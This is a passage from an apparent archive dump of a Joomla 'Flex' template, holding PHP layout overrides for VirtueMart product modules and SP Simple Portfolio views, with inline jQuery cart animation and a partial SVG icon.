							echo $currency->createPriceDiv ('salesPriceWithDiscount', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						}
					} ?>
				
					<?php if ($show_addtocart) {  ?>
						<hr /><div class="clear"></div>
					<?php echo shopFunctionsF::renderVmSubLayout('addtocart',array('product'=>$product)); ?>
					<div class="clear"></div>
                    
					<?php } ?>
                   </div> <!--spacer-inner-->
			    </div>
			</div>
			<?php
			if ($col == $products_per_row && $products_per_row && $col < $totalProd) {
				//echo "	</div><div style='clear:both;'>";
				$col = 1;
			} else {
				$col++;
			}
		} ?>
		</div>
		<div class="clear"></div>

		<?php
	} else {
		$last = count ($products) - 1;
		?>

		<ul class="vm-product<?php echo $params->get ('moduleclass_sfx'); ?> productdetails">
			<?php foreach ($products as $product) : ?>
			<li class="col-sm-<?php echo $col_sm; ?> col-md-<?php echo round(12/$products_per_row) ?> <?php echo $float ?>">
			
				<div class="spacer-img">
				<?php
				if (!empty($product->images[0])) {
					$image = $product->images[0]->displayMediaThumb ('class="featuredProductImage" border="0"', FALSE);
				} else {
					$image = '';
				}
				echo JHTML::_ ('link', JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' . $product->virtuemart_category_id), $image, array('title' => $product->product_name));
				echo '</div>';
				
				$url = JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' .
					$product->virtuemart_category_id); ?>
				<div class="spacer-inner">		
					<h5><a href="<?php echo $url ?>"><?php echo $product->product_name ?></a></h5>
                    <?php 
					if ($show_price and isset($product->prices)) {
						echo '<h4 class="product-price">'.$currency->createPriceDiv ('salesPrice', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						if ($product->prices['salesPriceWithDiscount'] > 0) {
							echo $currency->createPriceDiv ('salesPriceWithDiscount', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
						}
						echo '</h4>';
						
					}
				if ($show_addtocart) {
					echo shopFunctionsF::renderVmSubLayout('addtocart',array('product'=>$product));
				}
				echo '</div>';
				?>
				
			</li>
			<?php
			if ($col == $products_per_row && $products_per_row && $last) {
				echo '</ul>';
		       
		    echo '<ul class="vm-product' . $params->get ('moduleclass_sfx') . ' productdetails">';
				$col = 1;
			} else {
				$col++;
			}
			$last--;
		endforeach; ?>
		</ul>
		

		<?php
	}
	if ($footerText) : ?>
		<div class="vmfooter<?php echo $params->get ('moduleclass_sfx') ?>">
			<?php echo $footerText ?>
		</div>
		<?php endif; ?>
<?php
if(VmConfig::get ('jdynupdate', TRUE)){

$j = "jQuery(document).ready(function($) {
var productCustomization=$('.cd-customization'),cart=$('.cd-cart'),animating=false;initCustomization(productCustomization);$('body').on('click',function(event){if($(event.target).is('body')||$(event.target).is('.cd-gallery')){deactivateCustomization()}});function initCustomization(items){items.each(function(){var actual=$(this),addToCartBtn=actual.find('.add-to-cart'),touchSettings=actual.next('.cd-customization-trigger');addToCartBtn.on('click',function(){if(!animating){animating=true;resetCustomization(addToCartBtn);addToCartBtn.addClass('is-added').find('path').eq(0).animate({'stroke-dashoffset':0},300,function(){setTimeout(function(){updateCart();addToCartBtn.removeClass('is-added').find('.addtocart-button').on('webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend',function(){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false});if($('.no-csstransitions').length>0){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false}},600)})}});touchSettings.on('click',function(event){event.preventDefault();resetCustomization(addToCartBtn)})})}function resetCustomization(selectOptions){selectOptions.siblings('[data-type=\"select\"]').removeClass('is-open').end().parents('.cd-single-item').addClass('hover').parent('li').siblings('li').find('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function deactivateCustomization(){productCustomization.parent('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function updateCart(){(!cart.find('.total_products').hasClass('items-added'))&&cart.find('.total_products').addClass('items-added').removeClass('empty_basket');var cartItems=cart.find('span'),text=parseInt(cartItems.text())+1;cartItems.text(text)}
	
});";
vmJsApi::addJScript('vmPreloader',$j);
}
echo vmJsApi::writeJS();
?>
</div>PK!I)���+flex/html/mod_virtuemart_product/single.phpnu&1i�<?php // no direct access
defined('_JEXEC') or die('Restricted access');
vmJsApi::jPrice();

?>
<div class="vmgroup singleview <?php echo $params->get ('moduleclass_sfx') ?>">
<?php if ($headerText) { ?>
	<div class="vmheader"><?php echo $headerText ?></div>
<?php } ?>
<?php foreach ($products as $product) { ?>
	<div class="product-single-style">
    <div class="spacer">  
    <div class="product-image col-xs-12 col-sm-5 col-md-3 match-height">
<?php if (!empty($product->images[0]) )
 $image = $product->images[0]->displayMediaThumb('class="featuredProductImage" ',false) ;
 else $image = ''; 
 echo JHTML::_('link', JRoute::_('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id='.$product->virtuemart_product_id.'&virtuemart_category_id='.$product->virtuemart_category_id),$image,array('title' => $product->product_name) );
 //echo '<div class="clear"></div>'; ?>
  	</div>

    <?php $url = JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' . $product->virtuemart_category_id); ?>
     <div class="spacer-inner col-xs-12 col-sm-7 col-md-9 match-height mobile-centered">
     
        <h3><a href="<?php echo $url; ?>"><?php echo $product->product_name ?></a></h3>
            <?php if ($show_price) {  ?>
                <?php if (!empty($product->prices['salesPrice'])) {
                    echo $currency->createPriceDiv ('salesPrice', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
                }
            
                if (!empty($product->prices['salesPriceWithDiscount'])) {
                    echo $currency->createPriceDiv ('salesPriceWithDiscount', '', $product->prices, FALSE, FALSE, 1.0, TRUE);
                }
            } ?>
        
            <?php if ($show_addtocart) {  ?>
                <hr /><div class="clear"></div>
            <div class="mobile-centered"><?php echo shopFunctionsF::renderVmSubLayout('addtocart',array('product'=>$product)); ?></div>
            <div class="clear"></div>
            
            <?php } ?>
        </div> <!--spacer-->
     <div class="clear"></div><hr />
   </div>

	<?php } ?>
<?php if ($footerText) { ?>
	<div class="vmheader"><?php echo $footerText ?></div>
<?php } ?>
<?php
if(VmConfig::get ('jdynupdate', TRUE)){

$j = "jQuery(document).ready(function($) {
var productCustomization=$('.cd-customization'),cart=$('.cd-cart'),animating=false;initCustomization(productCustomization);$('body').on('click',function(event){if($(event.target).is('body')||$(event.target).is('.cd-gallery')){deactivateCustomization()}});function initCustomization(items){items.each(function(){var actual=$(this),addToCartBtn=actual.find('.add-to-cart'),touchSettings=actual.next('.cd-customization-trigger');addToCartBtn.on('click',function(){if(!animating){animating=true;resetCustomization(addToCartBtn);addToCartBtn.addClass('is-added').find('path').eq(0).animate({'stroke-dashoffset':0},300,function(){setTimeout(function(){updateCart();addToCartBtn.removeClass('is-added').find('.addtocart-button').on('webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend',function(){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false});if($('.no-csstransitions').length>0){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false}},600)})}});touchSettings.on('click',function(event){event.preventDefault();resetCustomization(addToCartBtn)})})}function resetCustomization(selectOptions){selectOptions.siblings('[data-type=\"select\"]').removeClass('is-open').end().parents('.cd-single-item').addClass('hover').parent('li').siblings('li').find('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function deactivateCustomization(){productCustomization.parent('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function updateCart(){(!cart.find('.total_products').hasClass('items-added'))&&cart.find('.total_products').addClass('items-added').removeClass('empty_basket');var cartItems=cart.find('span'),text=parseInt(cartItems.text())+1;cartItems.text(text)}
	
});";
vmJsApi::addJScript('vmPreloader',$j);
}
echo vmJsApi::writeJS();
?>
</div>PK!E۔v<v<1flex/html/com_spsimpleportfolio/items/default.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die();

require_once JPATH_COMPONENT . '/helpers/helper.php';
jimport( 'joomla.filesystem.file' );

$config = \JFactory::getConfig();
$sitename = $config->get('sitename');

$layout_type = $this->params->get('layout_type', 'default');
$column_bg = $this->params->get('column_bg');
$show_view_button = $this->params->get('show_view_button', 1);
$show_zoom_button = $this->params->get('show_zoom_button', 1);
$show_tags = $this->params->get('show_tags', 1);
$show_filter = $this->params->get('show_filter');
$filter_divider = $this->params->get('filter_divider');
$filter_style = $this->params->get('filter_style');
$show_all_txt = $this->params->get('show_all_txt');
$filter_margin = $this->params->get('filter_margin');
$video_width = $this->params->get('video_width');
$video_height = $this->params->get('video_height');

//Load the method jquery script.
JHtml::_('jquery.framework');

//Params
$params = JComponentHelper::getParams('com_spsimpleportfolio');
$square = strtolower( $params->get('square', '600x600') );
$rectangle = strtolower( $params->get('rectangle', '600x400') );
$tower = strtolower( $params->get('tower', '600x800') );

//Add js and css files
$doc = JFactory::getDocument();

//opengraph
$doc->addCustomTag('<meta property="og:url" content="'. \JURI::current() . '" />');
$doc->addCustomTag('<meta property="og:site_name" content="'. htmlspecialchars($sitename) .'" />');
$doc->addCustomTag('<meta property="og:type" content="page" />');
if ($this->params->get('page_heading')) {
$doc->addCustomTag('<meta property="og:title" content="'. $this->params->get('page_heading') .'" />');
}
// Twitter
$doc->addCustomTag('<meta name="twitter:card" content="summary" />');
$doc->addCustomTag('<meta name="twitter:site" content="'. htmlspecialchars($sitename) .'" />');
$doc->addCustomTag('<meta name="twitter:title" content="'. $this->params->get('page_heading') .'" />');

//First unset default files
unset($doc->_styleSheets[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/css/featherlight.min.css' ]);
unset($doc->_styleSheets[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/css/spsimpleportfolio.css' ]);
unset($doc->_scripts[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/js/jquery.shuffle.modernizr.min.js' ]);
unset($doc->_scripts[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/js/featherlight.min.js' ]);
unset($doc->_scripts[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/js/spsimpleportfolio.js' ]);

//Add updated js and css files
$doc->addStylesheet( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/css/featherlight.css' );
$doc->addStylesheet( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/css/featherlight.gallery.css' );
$doc->addStylesheet( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/css/spsimpleportfolio.css' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/jquery.shuffle.modernizr.min.js' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/featherlight.min.js' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/featherlight.gallery.min.js' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/spsimpleportfolio.js' );


$menu 	= JFactory::getApplication()->getMenu();
$itemId = '';
if(is_object($menu->getActive())) {
	$active = $menu->getActive();
	$itemId = '&Itemid=' . $active->id;
}

if( $this->params->get('show_page_heading') && $this->params->get( 'page_heading' ) ) {
	echo "<h1 class='page-header'>" . $this->params->get( 'page_heading' ) . "</h1>";
}

$showbtns = '';

$filter_divider != '' ? $filter_divider = '<span class="simple-divider">'.$filter_divider.'</span>' : $filter_divider = '';
$filter_style == 'simple' ? $simple_style = $filter_divider : $simple_style = '';

if($show_zoom_button==0 && $show_view_button==0 && $layout_type=='default') { 
   $showbtns = '.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper .sp-simpleportfolio-overlay {background:transparent}';
}

$addstyle = 'body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter > ul > li:first-child {'
	. 'margin-left:'.$filter_margin.'px;margin-right:0;'
	. '}'
	. $showbtns
	; 
$doc->addStyleDeclaration( $addstyle );

//random ID number to avoid conflict if there is more then one galleries on the same page
$randomid = rand(1,1000);

$i = 0;
//Sizes
$sizes = array(
	$rectangle,
	$tower,
	$square,

	$tower,
	$rectangle,
	$square,

	$square,
	$rectangle,
	$tower,

	$square,
	$tower,
	$rectangle
	);

?>
<div id="sp-simpleportfolio" class="sp-simpleportfolio sp-<?php echo $randomid; ?> sp-simpleportfolio-view-items layout-<?php echo str_replace('_', '-', $layout_type); ?>">

	<?php if($this->params->get('show_filter', 1)) { ?>
		<div class="sp-simpleportfolio-filter">
			<ul<?php echo ($this->params->get('filter_style') == 'simple') ? ' class="simple"' : ' class="flex"'; ?>>
				<li class="active<?php if($this->params->get('filter_margin') == 0) { ?> no-margin<?php } ?>" data-group="all"><a href="#">
				
                <?php if($this->params->get('show_all_txt') != '') { ?>
                   <?php echo $show_all_txt; ?>
                <?php } else { ?>
                  <?php echo JText::_('COM_SPSIMPLEPORTFOLIO_SHOW_ALL'); ?>
                <?php } ?>
                </a></li>
				<?php
					$filters = SpsimpleportfolioHelper::getTagList( $this->items );
					foreach ($filters as $filter) {
						?>
							<li<?php echo ($this->params->get('filter_margin') == 0) ? ' class="no-margin" ' : ' style="margin-left:'.$filter_margin.'px;" '; ?>data-group="<?php echo $filter->alias; ?>"><?php echo $simple_style; ?><a href="#"><?php echo $filter->title; ?></a></li>
						<?php } ?>
			</ul>
		</div>
	<?php } ?>

	<?php
	$video_width != '' ? $video_width : $video_width = '700';
	$video_height != '' ? $video_height : $video_height = '400';
	$column_bg != '' ? $column_background = ' style="background-color:'.$column_bg.'"' : $column_background = '';
	
	
		//Videos
		foreach ($this->items as $key => $this->item) {

			if($this->item->video) {
				$video = parse_url($this->item->video);

				switch($video['host']) {
					case 'youtu.be':
					$video_id 	= trim($video['path'],'/');
					$video_src 	= '//www.youtube.com/embed/' . $video_id;
					break;

					case 'www.youtube.com':
					case 'youtube.com':
					parse_str($video['query'], $query);
					$video_id 	= $query['v'];
					$video_src 	= '//www.youtube.com/embed/' . $video_id;
					break;

					case 'vimeo.com':
					case 'www.vimeo.com':
					$video_id 	= trim($video['path'],'/');
					$video_src 	= "//player.vimeo.com/video/" . $video_id;
				}

				echo '<iframe class="sp-simpleportfolio-lightbox" src="'. $video_src .'" width="'. $video_width .'" height="'. $video_height .'" id="sp-simpleportfolio-video'.$this->item->spsimpleportfolio_item_id.'" style="border:none;" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>';
			}
		}
	?>
	<div class="sp-simpleportfolio-items sp-simpleportfolio-columns-<?php echo $this->params->get('columns', 3); ?>">
		<?php foreach ($this->items as $this->item) { 
			$tags = SpsimpleportfolioHelper::getTags( $this->item->spsimpleportfolio_tag_id );
			$newtags = array();
			$filter = '';
			$groups = array();
			foreach ($tags as $tag) {
				$newtags[] 	 = $tag->title;
				$filter 	.= ' ' . $tag->alias;
				$groups[] 	.= '"' . $tag->alias . '"';
			}

			$groups = implode(',', $groups);
			?>

			<div class="sp-simpleportfolio-item" data-groups='[<?php echo $groups; ?>]'>
				<?php $this->item->url = JRoute::_('index.php?option=com_spsimpleportfolio&view=item&id='.$this->item->spsimpleportfolio_item_id.':'.$this->item->alias . $itemId); ?>
				
				<div class="sp-simpleportfolio-overlay-wrapper clearfix">
					
					<?php if($this->item->video) { ?>
						<span class="sp-simpleportfolio-icon-video"></span>
					<?php } ?>

                    <?php if($this->item->thumbnail) { 
						// New from SP Simple Portfolio 1.8 (additional thumbnail image)
						?>
						<img class="sp-simpleportfolio-img" src="<?php echo $this->item->thumb; ?>" alt="<?php echo $this->item->title; ?>">
					<?php } else {
						if($this->params->get('thumbnail_type', 'masonry') == 'masonry') { ?>
                            <img class="sp-simpleportfolio-img" src="<?php echo JURI::base(true) . '/images/spsimpleportfolio/' . $this->item->alias . '/' . JFile::stripExt(JFile::getName($this->item->image)) . '_' . $sizes[$i] . '.' . JFile::getExt($this->item->image); ?>" alt="<?php echo $this->item->title; ?>">
                        <?php } else if($this->params->get('thumbnail_type', 'masonry') == 'rectangular') { ?>
                            <img class="sp-simpleportfolio-img" src="<?php echo JURI::base(true) . '/images/spsimpleportfolio/' . $this->item->alias . '/' . JFile::stripExt(JFile::getName($this->item->image)) . '_'. $rectangle .'.' . JFile::getExt($this->item->image); ?>" alt="<?php echo $this->item->title; ?>">
                        <?php } else { ?>
                            <img class="sp-simpleportfolio-img" src="<?php echo JURI::base(true) . '/images/spsimpleportfolio/' . $this->item->alias . '/' . JFile::stripExt(JFile::getName($this->item->image)) . '_'. $square .'.' . JFile::getExt($this->item->image); ?>" alt="<?php echo $this->item->title; ?>">
                        <?php }  ?>
                    <?php }  ?>
					<?php // Popup Image (default = "original image", square, rectangle, tower)
                    $popup_image = $this->params->get('popup_image', 'default');
                    if($popup_image == 'quare') {
                        $this->item->popup_img_url = JURI::base(true) . '/images/spsimpleportfolio/' . $this->item->alias . '/' . JFile::stripExt(JFile::getName($this->item->image)) . '_'. $square .'.' . JFile::getExt($this->item->image);
                    } else if($popup_image == 'rectangle') {
                        $this->item->popup_img_url = JURI::base(true) . '/images/spsimpleportfolio/' . $this->item->alias . '/' . JFile::stripExt(JFile::getName($this->item->image)) . '_'. $rectangle .'.' . JFile::getExt($this->item->image);
                    } else if($popup_image == 'tower') {
                        $this->item->popup_img_url = JURI::base(true) . '/images/spsimpleportfolio/' . $this->item->alias . '/' . JFile::stripExt(JFile::getName($this->item->image)) . '_'. $tower .'.' . JFile::getExt($this->item->image);
                    } else {
                        $this->item->popup_img_url = JURI::base() . $this->item->image;
                    } ?>
					<div class="sp-simpleportfolio-overlay">
						<div class="sp-vertical-middle">
							<div>
								<div class="sp-simpleportfolio-btns">
									<?php if($show_view_button!=0) { ?>
                                        <?php if( $this->item->video ) { ?>
											 <?php if($show_zoom_button!=0) { ?>
                                                <a class="btn-zoom gallery-<?php echo $randomid; ?>" href="#" data-featherlight="#sp-simpleportfolio-video<?php echo $this->item->spsimpleportfolio_item_id; ?>"><?php echo JText::_('COM_SPSIMPLEPORTFOLIO_WATCH'); ?></a><a class="btn-view" href="<?php echo $this->item->url; ?>"><?php echo JText::_('COM_SPSIMPLEPORTFOLIO_VIEW'); ?></a>       
                                                <?php } else { ?>
                                             <a class="btn-view-only" href="<?php echo $this->item->url; ?>"><i class="fas fa-link"></i></a>
                                             <?php } ?>          
                                        <?php } else { ?> 
                                         <?php if($show_zoom_button!=0) { ?>
                                            <a class="btn-zoom gallery-<?php echo $randomid; ?>" href="<?php echo $this->item->popup_img_url; ?>" data-featherlight="image"><?php echo JText::_('COM_SPSIMPLEPORTFOLIO_ZOOM'); ?></a>
                                            <a class="btn-view" href="<?php echo $this->item->url; ?>"><?php echo JText::_('COM_SPSIMPLEPORTFOLIO_VIEW'); ?></a>       
                                         <?php } else { ?>
                                        	<a class="btn-view-only" href="<?php echo $this->item->url; ?>"><i class="fas fa-link"></i></a>
                                         <?php } ?> 
                                        <?php } ?> 
                                     <?php } else { ?>
                                     <?php if($show_zoom_button!=0) { ?> 
                                        <?php if( $this->item->video ) { ?>
                                            <a class="btn-zoom-icon gallery-<?php echo $randomid; ?>" href="#" data-featherlight="#sp-simpleportfolio-video<?php echo $this->item->spsimpleportfolio_item_id; ?>"><i class="fas fa-search"></i></a>
                                        <?php } else { ?>
                                            <a class="btn-zoom-icon gallery-<?php echo $randomid; ?>" href="<?php echo $this->item->popup_img_url; ?>" data-featherlight="image"><i class="fas fa-search"></i></a>
                                        <?php } ?>
                                      <?php } ?>   
                                    <?php } ?>
								</div>
								<?php if($layout_type!='default') { ?>
								<h3 class="sp-simpleportfolio-title">
									<a href="<?php echo $this->item->url; ?>">
										<?php echo $this->item->title; ?>
									</a>
								</h3>
									<?php if($show_tags!=0) { ?>
                                        <div class="sp-simpleportfolio-tags">
                                            [ <?php echo implode(', ', $newtags); ?> ]
                                        </div>
                                    <?php } ?>
								<?php } ?>
							</div>
						</div>
					</div>
				</div>
				<?php if($layout_type=='default') { ?>
					<div<?php echo $column_background; ?> class="sp-simpleportfolio-info">
						<h3 class="sp-simpleportfolio-title">
							<a href="<?php echo $this->item->url; ?>">
								<?php echo $this->item->title; ?>
							</a>
						</h3>
                        <?php if($show_tags!=0) { ?>
                            <div class="sp-simpleportfolio-tags">
                                <?php echo (count($newtags) > 1) ? '<i class="fas fa-tags"></i>' : '<i class="fas fa-tag"></i>'; ?><?php echo implode(', ', $newtags); ?>
                            </div>
                        <?php } ?>
					</div>
				<?php } ?>
			</div>
			<?php
			$i++;
			if($i==11) {
				$i = 0;
			}
			?>
		<?php } ?>
	</div>
	<?php if ($this->pagination->get('pages.total') >1) { ?>
	<div style="margin:25px auto 15px;" class="pagination clearfix">
		<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
	<?php } ?>
</div>
<script type="text/javascript">jQuery(document).ready(function(){jQuery('.gallery-<?php echo $randomid; ?>').featherlightGallery({
previousIcon: '<i class="arrow-previous-thin"></i>',nextIcon: '<i class="arrow-next-thin"></i>'});});</script>PK!{�MH�$�$0flex/html/com_spsimpleportfolio/item/default.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die();

$config = \JFactory::getConfig();
$sitename = $config->get('sitename');
$doc = JFactory::getDocument();

//opengraph
$doc->addCustomTag('<meta content="'. htmlspecialchars($sitename) .'" property="og:site_name" />');
// Twitter
$doc->addCustomTag('<meta name="twitter:card" content="summary" />');
$doc->addCustomTag('<meta name="twitter:site" content="'. htmlspecialchars($sitename) .'" />');
$doc->addCustomTag('<meta name="twitter:title" content="'. $this->item->title .'" />');
$doc->addCustomTag('<meta name="twitter:description" content="'. \JHtml::_('string.truncate', (strip_tags($this->item->description)), 150) .'" />');
if ($this->item->image) {
    $doc->addCustomTag('<meta name="twitter:image:src" content="'. \JURI::root().ltrim($this->item->image, '/') .'" />');
}


$doc->addStylesheet( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/css/spsimpleportfolio.css' );

if($this->params->get('remove_sidebar') == '2') {
	$full_width_style = ' style="width:100%;"';
} else {
	$full_width_style = '';
}

//video
if($this->item->video) {
	$video = parse_url($this->item->video);

	switch($video['host']) {
		case 'youtu.be':
		$video_id 	= trim($video['path'],'/');
		$video_src 	= '//www.youtube.com/embed/' . $video_id;
		break;

		case 'www.youtube.com':
		case 'youtube.com':
		parse_str($video['query'], $query);
		$video_id 	= $query['v'];
		$video_src 	= '//www.youtube.com/embed/' . $video_id;
		break;

		case 'vimeo.com':
		case 'www.vimeo.com':
		$video_id 	= trim($video['path'],'/');
		$video_src 	= "//player.vimeo.com/video/" . $video_id;
	}

}
?>
<div id="sp-simpleportfolio" class="sp-simpleportfolio sp-simpleportfolio-view-item">
	<div class="sp-simpleportfolio-image">
		<?php if($this->item->video) { ?>
		<div class="sp-simpleportfolio-embed">
			<iframe src="<?php echo $video_src; ?>" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>
		</div>
		<?php } else { ?>
		<?php if($this->item->image) { ?>
		<img class="sp-simpleportfolio-img" src="<?php echo $this->item->image; ?>" alt="<?php echo $this->item->title; ?>">
		<?php } else { ?>
		<img class="sp-simpleportfolio-img" src="<?php echo $this->item->thumbnail; ?>" alt="<?php echo $this->item->title; ?>">
		<?php } ?>
		<?php } ?>
	</div>
	<div class="sp-simpleportfolio-details clearfix">
		<div<?php echo $full_width_style; ?> class="sp-simpleportfolio-description entry-header">
			<h2><?php echo $this->item->title; ?>
            <div class="divider"></div></h2>
			<div class="clearfix"><?php echo JHtml::_('content.prepare', $this->item->description); ?></div>
			<?php if($this->params->get('show_back_to_cat_btn', 1) == '1') { ?>
            <hr /><a class="btn sppb-btn-default btn-sm" href="javascript:history.back()"><i style="margin-left:-7px;margin-right:7px;" class="pe pe-7s-back"></i><?php echo JText::_('COM_SPPORTFOLIO_BACK_TO_CATEGORY'); ?></a>
            <?php } ?>
		</div>    
        <?php if($this->params->get('remove_sidebar', 1) == '1') { ?>
        <div class="sp-simpleportfolio-meta">
			<?php 
				// Sidebar style without labels (only tooltips)
				if($this->params->get('sidebar_labels', 1) == '2') {
					
                    // create conditions for client title and logo
                    $client_title_conditon 		= (isset($this->item->client) && $this->item->client);
                    $client_avatar_condition 	= (isset($this->item->client_avatar) && $this->item->client_avatar);
    
                    if( $client_title_conditon || $client_avatar_condition){ ?>
                        <div class="sp-simpleportfolio-client sp-module no-labels">
							<?php if( $client_avatar_condition ){ 
                                    $client_avatar_alt = ($client_title_conditon) ? $this->item->client : $this->item->title;
                                ?>
                                <div class="sp-simpleportfolio-client-avatar no-labels"><img src="<?php echo JURI::root() . $this->item->client_avatar?>" alt="<?php echo $client_avatar_alt; ?>"></div>
                            <?php } //client_avatar_condition ?>
                            <?php if( $client_title_conditon ){ ?>
                                <div style="margin-top:18px;" class="sp-module-content no-labels"><i class="pe pe-7s-ribbon hasTooltip" title="<?php echo JText::_('COM_SPSIMPLEPORTFOLIO_PROJECT_CLIENT'); ?>"></i><?php echo $this->item->client; ?></div>
                            <?php } //client_title_conditon ?>
                        </div> <!-- /.sp-simpleportfolio-client -->
                        <hr />
                    <?php } // has project client logo or title ?>
                    <div class="sp-simpleportfolio-created sp-module no-labels">
                        <div class="sp-module-content"><i class="pe pe-7s-date hasTooltip" title="<?php echo JText::_('COM_SPSIMPLEPORTFOLIO_PROJECT_DATE'); ?>"></i><?php echo JHtml::_('date', $this->item->created_on, JText::_('DATE_FORMAT_LC3')); ?></div>
                    </div>
                    <hr />
                    <div class="sp-simpleportfolio-tags sp-module no-labels">
                        <div class="sp-module-content"><i class="pe pe-7s-ticket hasTooltip" title="<?php echo JText::_('COM_SPSIMPLEPORTFOLIO_PROJECT_CATEGORIES'); ?>"></i><?php echo implode(', ', $this->item->tags); ?></div>   
                    </div>
                    <hr />
                    <?php if ($this->item->url) { ?>
                    <div class="sp-simpleportfolio-link sp-module">
                        <a class="btn sppb-btn-dark sppb-btn-3d" target="_blank" href="<?php echo $this->item->url; ?>"><i style="padding-right:8px;font-size:140%;margin:-1px 0 0 -2px;vertical-align:middle;line-height:1.4;" class="pe pe-7s-airplay"></i><?php echo JText::_('COM_SPSIMPLEPORTFOLIO_VIEW_PROJECT'); ?></a>
                    </div>
                    <?php } ?>
           
		   <?php } 
			   // Sidebar style with labels (classic)
			   else { 
                    // create conditions for client title and logo
                    $client_title_conditon 		= (isset($this->item->client) && $this->item->client);
                    $client_avatar_condition 	= (isset($this->item->client_avatar) && $this->item->client_avatar);
    
                    if( $client_title_conditon || $client_avatar_condition){ ?>
                        <div class="sp-simpleportfolio-client sp-module">
                            <h3 class="sp-module-title"><i style="margin-right:1px;" class="far fa-address-card"></i>
                            <?php echo JText::_('COM_SPSIMPLEPORTFOLIO_PROJECT_CLIENT'); ?>
                            <div class="divider"></div></h3><div class="divider"></div>
                                <?php if( $client_avatar_condition ){ 
                                        $client_avatar_alt = ($client_title_conditon) ? $this->item->client : $this->item->title;
                                    ?>
                                    <div class="sp-simpleportfolio-client-avatar">
                                        <img src="<?php echo JURI::root() . $this->item->client_avatar?>" alt="<?php echo $client_avatar_alt; ?>">
                                    </div>
                                <?php } //client_avatar_condition ?>
        
                                <?php if( $client_title_conditon ){ ?>
                                    <div class="sp-simpleportfolio-client-title">
                                        <?php echo $this->item->client; ?>
                                    </div>
                                <?php } //client_title_conditon ?>
                        </div>
                    <?php } // has project client logo or title ?>
                    
                    <div class="sp-simpleportfolio-created sp-module">
                        <h3 class="sp-module-title"><i class="far fa-calendar-alt"></i> <?php echo JText::_('COM_SPSIMPLEPORTFOLIO_PROJECT_DATE'); ?><div class="divider"></div></h3><div class="divider"></div>
                        <div class="sp-module-content"><?php echo JHtml::_('date', $this->item->created_on, JText::_('DATE_FORMAT_LC3')); ?></div>
                    </div>
                    <div class="sp-simpleportfolio-tags sp-module">
                        <h3 class="sp-module-title"><i style="margin-right:1px;" class="fas fa-tags"></i> <?php echo JText::_('COM_SPSIMPLEPORTFOLIO_PROJECT_CATEGORIES'); ?><div class="divider"></div></h3><div class="divider"></div>
                        <div class="sp-module-content"><?php echo implode(', ', $this->item->tags); ?></div>
                    </div>
                    <?php if ($this->item->url) { ?>
                    <div class="sp-simpleportfolio-link sp-module">
                        <a class="btn sppb-btn-dark sppb-btn-3d" target="_blank" href="<?php echo $this->item->url; ?>"><i style="padding-right:8px;" class="fas fa-external-link-alt"></i><?php echo JText::_('COM_SPSIMPLEPORTFOLIO_VIEW_PROJECT'); ?></a>
                    </div>
                    <?php } ?>
                    
                <?php } ?> 
            </div>
        <?php } ?>  
	</div>
</div>PK!g	 ���8flex/html/com_spsimpleportfolio/assets/img/icon-play.svgnu&1i�<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="64px" height="64px" viewBox="223 223 64 64" enable-background="new 223 223 64 64" xml:space="preserve">
<path opacity="0.5" d="M255,283.224c-15.523,0-28.224-12.701-28.224-28.224s12.701-28.224,28.224-28.224
